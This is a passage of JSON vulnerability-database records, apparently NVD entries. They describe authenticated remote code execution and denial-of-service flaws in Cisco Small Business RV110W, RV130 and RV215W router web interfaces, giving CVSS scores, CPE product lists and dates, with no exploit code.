vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1207", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1207"], "modified": "2021-01-15T19:46:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1207", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1207", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:20", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1216", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1216"], "modified": "2021-01-15T19:42:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1216", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:07", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1204", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1204"], "modified": "2021-01-19T19:00:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1204", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1204", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:16", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1163", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1163"], "modified": "2021-01-19T19:32:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1163", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:45", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1186", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1186"], "modified": "2021-01-15T19:54:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1186", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1186", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:04", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1201", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1201"], "modified": "2021-01-19T19:03:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv215w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8"], "id": "CVE-2021-1201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1201", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv215w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:45", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1185", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1185"], "modified": "2021-01-15T19:55:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1185", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:52", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1192", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1192"], "modified": "2021-01-15T19:50:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1192", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1192", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:06", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1203", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1203"], "modified": "2021-01-19T19:01:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1203", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:19", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": 